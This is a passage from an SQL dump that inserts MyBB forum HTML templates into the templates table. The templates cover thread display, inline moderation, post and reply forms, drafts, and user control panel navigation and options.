'showthread_inlinemoderation', '<script type=\"text/javascript\" src=\"jscripts/inline_moderation.js?ver=1600\"></script> <form action=\"moderation.php\" method=\"post\" style=\"margin-top: 0; margin-bottom: 0;\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> <input type=\"hidden\" name=\"modtype\" value=\"inlinepost\" /> <span class=\"smalltext\"><strong>{$lang->inline_post_moderation}</strong></span> <select name=\"action\"> <optgroup label=\"{$lang->standard_mod_tools}\"> <option value=\"multideleteposts\">{$lang->inline_delete_posts}</option> <option value=\"multimergeposts\">{$lang->inline_merge_posts}</option> <option value=\"multisplitposts\">{$lang->inline_split_posts}</option> <option value=\"multiapproveposts\">{$lang->inline_approve_posts}</option> <option value=\"multiunapproveposts\">{$lang->inline_unapprove_posts}</option> </optgroup> {$customposttools} </select> <input type=\"submit\" class=\"button\" name=\"go\" value=\"{$lang->go} ({$inlinecount})\" id=\"inline_go\" />&nbsp; <input type=\"button\" class=\"button\" onclick=\"javascript:inlineModeration.clearChecked();\" value=\"{$lang->clear}\" /> </form> <script type=\"text/javascript\"> <!-- var go_text = \"{$lang->inline_go}\"; var all_text = \"{$threadcount}\"; var inlineType = \"thread\"; var inlineId = {$tid}; // --> </script><br />', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('29', 'showthread_classic_header', '<tr> <td class=\"tcat\" width=\"15%\"><span class=\"smalltext\"><strong>{$lang->author}</strong></span></td> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->message}</strong></span></td> </tr> ', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('30', 'showthread', '<html> <head> <title>{$thread[\'subject\']}</title> {$headerinclude} <script type=\"text/javascript\"> <!-- var quickdelete_confirm = \"{$lang->quickdelete_confirm}\"; // --> </script> <script type=\"text/javascript\" src=\"jscripts/thread.js?ver=1603\"></script> </head> <body> {$header} {$pollbox} <div class=\"float_left\"> {$multipage} </div> <div class=\"float_right\"> {$newreply} </div> {$ratethread} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both; border-bottom-width: 0;\"> <tr> <td class=\"thead\" colspan=\"2\"> <div style=\"float: right;\"> <span class=\"smalltext\"><strong><a href=\"showthread.php?mode=threaded&amp;tid={$tid}&amp;pid={$pid}#pid{$pid}\">{$lang->threaded}</a> | <a href=\"showthread.php?mode=linear&amp;tid={$tid}&amp;pid={$pid}#pid{$pid}\">{$lang->linear}</a></strong></span> </div> <div> <strong>{$thread[\'threadprefix\']}{$thread[\'subject\']}</strong> </div> </td> </tr> {$classic_header} </table> <div id=\"posts\"> {$posts} </div> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"border-top-width: 0;\"> <tr> <td colspan=\"2\" class=\"tfoot\"> {$search_thread} <div> <strong>&laquo; <a href=\"{$next_oldest_link}\">{$lang->next_oldest}</a> | <a href=\"{$next_newest_link}\">{$lang->next_newest}</a> &raquo;</strong> </div> </td> </tr> </table> <div class=\"float_left\"> {$multipage} </div> <div style=\"padding-top: 4px;\" class=\"float_right\"> {$newreply} </div> <br style=\"clear: both;\" /> {$quickreply} {$threadexbox} {$similarthreads} <br /> <div class=\"float_left\"> <ul class=\"thread_tools\"> <li class=\"printable\"><a href=\"printthread.php?tid={$tid}\">{$lang->view_printable}</a></li> <li class=\"sendthread\"><a href=\"sendthread.php?tid={$tid}\">{$lang->send_thread}</a></li> <li class=\"subscription_{$add_remove_subscription}\"><a href=\"usercp2.php?action={$add_remove_subscription}subscription&amp;tid={$tid}&amp;my_post_key={$mybb->post_code}\">{$add_remove_subscription_text}</a></li> </ul> </div> <div class=\"float_right\" style=\"text-align: right;\"> {$moderationoptions} {$forumjump} </div> <br style=\"clear: both;\" /> {$usersbrowsing} {$footer} </body> </html>', '-2', '1603', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('31', 'showthread_usersbrowsing', '<br /> <span class=\"smalltext\">{$lang->users_browsing_thread} {$onlinemembers}{$onlinesep}{$invisonline}{$onlinesep2}{$guestsonline}</span> <br />', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('32', 'showthread_usersbrowsing_user', '{$comma}<a href=\"{$user[\'profilelink\']}\" title=\"{$lang->users_browsing_thread_reading} ({$user[\'reading\']})\">{$user[\'username\']}</a>{$invisiblemark}', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('33', 'showthread_ratethread', '<div style=\"margin-top: 6px; padding-right: 10px;\" class=\"float_right\"> <script type=\"text/javascript\" src=\"jscripts/rating.js?ver=1400\"></script> <div id=\"success_rating_{$thread[\'tid\']}\" style=\"float: left; padding-top: 2px; padding-right: 10px;\">&nbsp;</div> <strong style=\"float: left; padding-right: 10px;\">{$lang->thread_rating}</strong> <div class=\"inline_rating\"> <ul class=\"star_rating{$not_rated}\" id=\"rating_thread_{$thread[\'tid\']}\"> <li style=\"width: {$thread[\'width\']}%\" class=\"current_rating\" id=\"current_rating_{$thread[\'tid\']}\">{$ratingvotesav}</li> <li><a class=\"one_star\" title=\"{$lang->one_star}\" href=\"./ratethread.php?tid={$thread[\'tid\']}&amp;rating=1&amp;my_post_key={$mybb->post_code}\">1</a></li> <li><a class=\"two_stars\" title=\"{$lang->two_stars}\" href=\"./ratethread.php?tid={$thread[\'tid\']}&amp;rating=2&amp;my_post_key={$mybb->post_code}\">2</a></li> <li><a class=\"three_stars\" title=\"{$lang->three_stars}\" href=\"./ratethread.php?tid={$thread[\'tid\']}&amp;rating=3&amp;my_post_key={$mybb->post_code}\">3</a></li> <li><a class=\"four_stars\" title=\"{$lang->four_stars}\" href=\"./ratethread.php?tid={$thread[\'tid\']}&amp;rating=4&amp;my_post_key={$mybb->post_code}\">4</a></li> <li><a class=\"five_stars\" title=\"{$lang->five_stars}\" href=\"./ratethread.php?tid={$thread[\'tid\']}&amp;rating=5&amp;my_post_key={$mybb->post_code}\">5</a></li> </ul> </div> </div>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('34', 'forumjump_advanced', '<form action=\"forumdisplay.php\" method=\"get\"> <span class=\"smalltext\"><strong>{$lang->forumjump}</strong></span> <select name=\"{$name}\" onchange=\"window.location=({$forum_link})\"> <option value=\"-1\" {$jumpsel[\'default\']}>{$lang->forumjump_select}</option> <option value=\"-1\">--------------------</option> <option value=\"-4\">{$lang->forumjump_pms}</option> <option value=\"-3\">{$lang->forumjump_usercp}</option> <option value=\"-5\">{$lang->forumjump_wol}</option> <option value=\"-2\">{$lang->forumjump_search}</option> <option value=\"-1\">{$lang->forumjump_home}</option> {$forumjumpbits} </select> {$gobutton} </form> ', '-2', '1608', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('35', 'forumdisplay_searchforum', '<form action=\"search.php\" method=\"post\"> <span class=\"smalltext\"><strong>{$lang->search_forum}</strong></span> <input type=\"text\" class=\"textbox\" name=\"keywords\" /> {$gobutton} <input type=\"hidden\" name=\"action\" value=\"do_search\" /> <input type=\"hidden\" name=\"forums\" value=\"{$fid}\" /> <input type=\"hidden\" name=\"postthread\" value=\"1\" /> </form><br />', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('36', 'editpost', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->edit_post}</title> {$headerinclude} <script type=\"text/javascript\" src=\"jscripts/post.js?ver=1400\"></script> </head> <body> {$header} {$preview} {$post_errors} {$attacherror} <form action=\"editpost.php\" method=\"post\" name=\"editpost\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"><strong>{$lang->delete_post}</strong></td> </tr> <tr> <td class=\"trow1\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"delete\" value=\"1\" tabindex=\"9\" /> <strong>{$lang->delete_q}</strong></td> <td class=\"trow1\" width=\"100%\">{$lang->delete_1}<br /><span class=\"smalltext\">{$lang->delete_2}</span></td> <td class=\"trow1\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_now}\" tabindex=\"10\" /></td> </tr> </table> <input type=\"hidden\" name=\"action\" value=\"deletepost\" /> <input type=\"hidden\" name=\"pid\" value=\"{$pid}\" /> </form> <br /> <form action=\"editpost.php?pid={$pid}&amp;processed=1\" method=\"post\" enctype=\"multipart/form-data\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_post}</strong></td> </tr> {$loginbox} <tr> <td class=\"trow2\"><strong>{$lang->subject}</strong></td> <td class=\"trow2\">{$prefixselect}<input type=\"text\" class=\"textbox\" name=\"subject\" size=\"40\" maxlength=\"85\" value=\"{$subject}\" tabindex=\"1\" /></td> </tr> {$posticons} <tr> <td class=\"trow2\" valign=\"top\"><strong>{$lang->your_message}:</strong><br /><div style=\"text-align: center;\">{$smilieinserter}</div></td> <td class=\"trow2\"> <textarea name=\"message\" id=\"message\" rows=\"20\" cols=\"70\" tabindex=\"3\">{$message}</textarea> {$codebuttons} </td> </tr> <tr> <td class=\"trow1\" valign=\"top\"><strong>{$lang->post_options}</strong></td> <td class=\"trow1\"><span class=\"smalltext\"> <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[signature]\" value=\"1\" tabindex=\"6\"{$postoptionschecked[\'signature\']} /> {$lang->options_sig}</label> {$disablesmilies}</span> </td> </tr> {$subscriptionmethod} {$pollbox} </table> {$attachbox} <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_post}\" tabindex=\"3\" accesskey=\"s\" /> <input type=\"submit\" class=\"button\" name=\"previewpost\" value=\"{$lang->preview_post}\" tabindex=\"4\" /></div> <input type=\"hidden\" name=\"action\" value=\"do_editpost\" /> <input type=\"hidden\" name=\"posthash\" value=\"{$posthash}\" /> <input type=\"hidden\" name=\"attachmentaid\" value=\"\" /> <input type=\"hidden\" name=\"attachmentact\" value=\"\" /> </form> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('37', 'editpost_disablesmilies', '<br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[disablesmilies]\" value=\"1\" tabindex=\"8\"{$postoptionschecked[\'disablesmilies\']} /> {$lang->options_disablesmilies}</label>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('38', 'newreply', '<html> <head> <title>{$lang->post_reply_to}</title> {$headerinclude} <script type=\"text/javascript\" src=\"jscripts/post.js?ver=1400\"></script> </head> <body> {$header} {$preview} {$maximageserror} {$attacherror} {$reply_errors} <form action=\"newreply.php?tid={$tid}&amp;processed=1\" method=\"post\" enctype=\"multipart/form-data\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->post_new_reply}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->reply_to}</strong></span></td> </tr> {$loginbox} <tr> <td class=\"trow2\" width=\"20%\"><strong>{$lang->post_subject}</strong></td> <td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"subject\" size=\"40\" maxlength=\"85\" value=\"{$subject}\" tabindex=\"1\" /></td> </tr> {$posticons} <tr> <td class=\"trow2\" valign=\"top\"><strong>{$lang->your_message}</strong><br />{$smilieinserter}</td> <td class=\"trow2\"> <textarea id=\"message\" name=\"message\" rows=\"20\" cols=\"70\" tabindex=\"2\" >{$message}</textarea> {$codebuttons} {$multiquote_external} </td> </tr> <tr> <td class=\"trow1\" valign=\"top\"><strong>{$lang->post_options}</strong></td> <td class=\"trow1\"><span class=\"smalltext\"> <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[signature]\" value=\"1\" tabindex=\"6\"{$postoptionschecked[\'signature\']} /> {$lang->options_sig}</label> {$disablesmilies} </span></td> </tr> {$modoptions} {$subscriptionmethod} {$captcha} </table> {$attachbox} <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->post_reply}\" tabindex=\"3\" accesskey=\"s\" /> <input type=\"submit\" class=\"button\" name=\"previewpost\" value=\"{$lang->preview_post}\" tabindex=\"4\" />{$savedraftbutton}</div> <input type=\"hidden\" name=\"action\" value=\"do_newreply\" /> <input type=\"hidden\" name=\"replyto\" value=\"{$replyto}\" /> <input type=\"hidden\" name=\"posthash\" value=\"{$posthash}\" /> <input type=\"hidden\" name=\"attachmentaid\" value=\"\" /> <input type=\"hidden\" name=\"attachmentact\" value=\"\" /> <input type=\"hidden\" name=\"quoted_ids\" value=\"{$quoted_ids}\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> {$editdraftpid} </form> {$forumrules} {$threadreview} {$footer} </body> </html>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('39', 'newreply_disablesmilies', '<br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[disablesmilies]\" value=\"1\" tabindex=\"9\"{$postoptionschecked[\'disablesmilies\']} /> {$lang->options_disablesmilies}</label>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('40', 'usercp_drafts', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->drafts}</title> {$headerinclude} </head> <body> {$header} <form action=\"usercp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"4\"><strong>{$lang->drafts} {$draftcount}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->draft_title}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->draft_saved}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"20%\"><span class=\"smalltext\"><strong>{$lang->draft_options}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"1\"><input type=\"checkbox\" class=\"checkbox checkall\" /></td> </tr> {$drafts} </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"action\" value=\"do_drafts\" /> <input type=\"submit\" class=\"button\" name=\"draftman\" value=\"{$lang->delete_drafts}\" $disable_delete_drafts /> </div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('41', 'usercp_drafts_draft', '<tr> <td class=\"{$trow}\"><strong>{$draft[\'subject\']}</strong><br /><span class=\"smalltext\">{$detail}</span></td> <td class=\"{$trow}\" align=\"center\">{$savedate}, {$savetime}</td> <td class=\"{$trow}\" align=\"center\"><a href=\"{$editurl}\">{$lang->edit_draft}</a></td> <td class=\"{$trow}\" align=\"center\"><input type=\"checkbox\" class=\"checkbox\" name=\"deletedraft[{$id}]\" value=\"{$type}\" /></td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('42', 'newthread', '<html> <head> <title>{$lang->newthread_in}</title> {$headerinclude} <script type=\"text/javascript\" src=\"jscripts/post.js?ver=1400\"></script> </head> <body> {$header} {$preview} {$thread_errors} {$attacherror} <form action=\"newthread.php?fid={$fid}&amp;processed=1\" method=\"post\" enctype=\"multipart/form-data\" name=\"input\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->post_new_thread}</strong></td> </tr> {$loginbox} <tr> <td class=\"trow2\" width=\"20%\"><strong>{$lang->thread_subject}</strong></td> <td class=\"trow2\">{$prefixselect}<input type=\"text\" class=\"textbox\" name=\"subject\" size=\"40\" maxlength=\"85\" value=\"{$subject}\" tabindex=\"1\" /></td> </tr> {$posticons} <tr> <td class=\"trow2\" valign=\"top\"><strong>{$lang->your_message}</strong>{$smilieinserter}</td> <td class=\"trow2\"> <textarea name=\"message\" id=\"message\" rows=\"20\" cols=\"70\" tabindex=\"2\">{$message}</textarea> {$codebuttons} {$multiquote_external} </td> </tr> <tr> <td class=\"trow1\" valign=\"top\"><strong>{$lang->post_options}</strong></td> <td class=\"trow1\"><span class=\"smalltext\"> <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[signature]\" value=\"1\" tabindex=\"7\"{$postoptionschecked[\'signature\']} /> {$lang->options_sig}</label> {$disablesmilies}</span></td> </tr> {$modoptions} {$subscriptionmethod} {$pollbox} {$captcha} </table> {$attachbox} <br /> <div style=\"text-align:center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->post_thread}\" tabindex=\"4\" accesskey=\"s\" /> <input type=\"submit\" class=\"button\" name=\"previewpost\" value=\"{$lang->preview_post}\" tabindex=\"5\" />{$savedraftbutton}</div> <input type=\"hidden\" name=\"action\" value=\"do_newthread\" /> <input type=\"hidden\" name=\"posthash\" value=\"{$posthash}\" /> <input type=\"hidden\" name=\"attachmentaid\" value=\"\" /> <input type=\"hidden\" name=\"attachmentact\" value=\"\" /> <input type=\"hidden\" name=\"quoted_ids\" value=\"{$quoted_ids}\" /> <input type=\"hidden\" name=\"tid\" value=\"{$tid}\" /> {$editdraftpid} </form> {$forumrules} {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('43', 'newthread_disablesmilies', '<br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[disablesmilies]\" value=\"1\" tabindex=\"9\"{$postoptionschecked[\'disablesmilies\']} /> {$lang->options_disablesmilies}</label>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('44', 'usercp_nav', '<td width=\"{$lang->ucp_nav_width}\" valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\"><strong>{$lang->ucp_nav_menu}</strong></td> </tr> <tr> <td class=\"trow1 smalltext\"><a href=\"usercp.php\" class=\"usercp_nav_item usercp_nav_home\">{$lang->ucp_nav_home}</a></td> </tr> {$usercpmenu} </table> </td>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('45', 'usercp_nav_messenger', '<tr> <td class=\"tcat\"> <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'usercppms\']}.gif\" id=\"usercppms_img\" class=\"expander\" alt=\"[-]\"/></div> <div><span class=\"smalltext\"><strong>{$lang->ucp_nav_messenger}</strong></span></div> </td> </tr> <tbody style=\"{$collapsed[\'usercppms_e\']}\" id=\"usercppms_e\"> <tr><td class=\"trow1 smalltext\"><a href=\"private.php?action=send\" class=\"usercp_nav_item usercp_nav_composepm\">{$lang->ucp_nav_compose}</a></td></tr> <tr> <td class=\"trow1 smalltext\"> {$folderlinks} </td> </tr> <tr><td class=\"trow1 smalltext\"><a href=\"private.php?action=tracking\" class=\"usercp_nav_item usercp_nav_pmtracking\">{$lang->ucp_nav_tracking}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"private.php?action=folders\" class=\"usercp_nav_item usercp_nav_pmfolders\">{$lang->ucp_nav_edit_folders}</a></td></tr> </tbody> ', '-2', '1605', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('46', 'usercp_nav_profile', '<tr> <td class=\"tcat\"> <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'usercpprofile\']}.gif\" id=\"usercpprofile_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><span class=\"smalltext\"><strong>{$lang->ucp_nav_profile}</strong></span></div> </td> </tr> <tbody style=\"{$collapsed[\'usercpprofile_e\']}\" id=\"usercpprofile_e\"> <tr><td class=\"trow1 smalltext\"> <div><a href=\"usercp.php?action=profile\" class=\"usercp_nav_item usercp_nav_profile\">{$lang->ucp_nav_edit_profile}</a></div> {$changenameop} <div><a href=\"usercp.php?action=password\" class=\"usercp_nav_item usercp_nav_password\">{$lang->ucp_nav_change_pass}</a></div> <div><a href=\"usercp.php?action=email\" class=\"usercp_nav_item usercp_nav_email\">{$lang->ucp_nav_change_email}</a></div> <div><a href=\"usercp.php?action=avatar\" class=\"usercp_nav_item usercp_nav_avatar\">{$lang->ucp_nav_change_avatar}</a></div> {$changesigop} </td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=options\" class=\"usercp_nav_item usercp_nav_options\">{$lang->ucp_nav_edit_options}</a></td></tr> </tbody>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('47', 'usercp_nav_editsignature', '<div><a href=\"usercp.php?action=editsig\" class=\"usercp_nav_item usercp_nav_editsig\">{$lang->ucp_nav_edit_sig}</a></div>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('48', 'usercp_nav_misc', '<tr> <td class=\"tcat\"> <div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'usercpmisc\']}.gif\" id=\"usercpmisc_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div> <div><span class=\"smalltext\"><strong>{$lang->ucp_nav_misc}</strong></span></div> </td> </tr> <tbody style=\"{$collapsed[\'usercpmisc_e\']}\" id=\"usercpmisc_e\"> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=usergroups\" class=\"usercp_nav_item usercp_nav_usergroups\">{$lang->ucp_nav_usergroups}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=editlists\" class=\"usercp_nav_item usercp_nav_editlists\">{$lang->ucp_nav_editlists}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=attachments\" class=\"usercp_nav_item usercp_nav_attachments\">{$lang->ucp_nav_attachments}</a></td></tr> <tr><td class=\"trow1 smalltext\">{$draftstart}<a href=\"usercp.php?action=drafts\" class=\"usercp_nav_item usercp_nav_drafts\">{$lang->ucp_nav_drafts} {$draftcount}</a>{$draftend}</td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=subscriptions\" class=\"usercp_nav_item usercp_nav_subscriptions\">{$lang->ucp_nav_subscribed_threads}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"usercp.php?action=forumsubscriptions\" class=\"usercp_nav_item usercp_nav_fsubscriptions\">{$lang->ucp_nav_forum_subscriptions}</a></td></tr> <tr><td class=\"trow1 smalltext\"><a href=\"{$profile_link}\" class=\"usercp_nav_item usercp_nav_viewprofile\">{$lang->ucp_nav_view_profile}</a></td></tr> </tbody>', '-2', '1601', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('49', 'usercp_profile_away', '<br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->away_information}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td colspan=\"2\"><span class=\"smalltext\">{$lang->away_status}</span></td> </tr> <tr> <td><span class=\"smalltext\"><input type=\"radio\" class=\"radio\" name=\"away\" value=\"1\" {$awaycheck[\'1\']} /> {$lang->im_away}</span></td> <td><span class=\"smalltext\"><input type=\"radio\" class=\"radio\" name=\"away\" value=\"0\" {$awaycheck[\'0\']} /> {$lang->im_here}</span></td> </tr> <tr> <td colspan=\"2\"><span class=\"smalltext\">{$lang->away_reason}</span></td> </tr> <tr> <td colspan=\"2\"><input type=\"text\" class=\"textbox\" name=\"awayreason\" value=\"{$user[\'awayreason\']}\" size=\"25\" /></td> </tr> </table> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td colspan=\"3\"><span class=\"smalltext\">{$lang->return_date}</span></td> </tr> <tr> <td> <select name=\"awayday\"> <option value=\"\">&nbsp;</option> {$returndatesel} </select> </td> <td> <select name=\"awaymonth\"> <option value=\"\">&nbsp;</option> <option value=\"1\" {$returndatemonthsel[\'1\']}>{$lang->month_1}</option> <option value=\"2\" {$returndatemonthsel[\'2\']}>{$lang->month_2}</option> <option value=\"3\" {$returndatemonthsel[\'3\']}>{$lang->month_3}</option> <option value=\"4\" {$returndatemonthsel[\'4\']}>{$lang->month_4}</option> <option value=\"5\" {$returndatemonthsel[\'5\']}>{$lang->month_5}</option> <option value=\"6\" {$returndatemonthsel[\'6\']}>{$lang->month_6}</option> <option value=\"7\" {$returndatemonthsel[\'7\']}>{$lang->month_7}</option> <option value=\"8\" {$returndatemonthsel[\'8\']}>{$lang->month_8}</option> <option value=\"9\" {$returndatemonthsel[\'9\']}>{$lang->month_9}</option> <option value=\"10\" {$returndatemonthsel[\'10\']}>{$lang->month_10}</option> <option value=\"11\" {$returndatemonthsel[\'11\']}>{$lang->month_11}</option> <option value=\"12\" {$returndatemonthsel[\'12\']}>{$lang->month_12}</option> </select> </td> <td> <input type=\"text\" class=\"textbox\" size=\"4\" maxlength=\"4\" name=\"awayyear\" value=\"{$returndate[\'2\']}\" /> </td> </tr> </table> </fieldset>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('50', 'usercp_options', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->edit_options}</title> {$headerinclude} </head> <body> {$header} <form action=\"usercp.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> {$errors} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->edit_options}</strong></td> </tr> <tr> <td width=\"50%\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->login_cookies_privacy}</strong></legend> <table cellspacing=\"0\" cellpadding=\"2\"> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"invisible\" id=\"invisible\" value=\"1\" {$invisiblecheck} /></td> <td><span class=\"smalltext\"><label for=\"invisible\">{$lang->invisible_mode}</label></span></td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong>{$lang->messaging_notification}</strong></legend> <table cellspacing=\"0\" cellpadding=\"2\"> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"allownotices\" id=\"allownotices\" value=\"1\" {$allownoticescheck} /></td> <td><span class=\"smalltext\"><label for=\"allownotices\">{$lang->allow_notices}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"hideemail\" id=\"hideemail\" value=\"1\" {$hideemailcheck} /></td> <td><span class=\"smalltext\"><label for=\"hideemail\">{$lang->allow_emails}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"receivepms\" id=\"receivepms\" value=\"1\" {$receivepmscheck} /></td> <td><span class=\"smalltext\"><label for=\"receivepms\">{$lang->receive_pms}</label></span></td> </tr> {$pms_from_buddys} <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"pmnotice\" id=\"pmnotice\" value=\"1\"{$pmnoticecheck} /></td> <td><span class=\"smalltext\"><label for=\"pmnotice\">{$lang->pm_notice}</label></span></td> </tr> <tr> 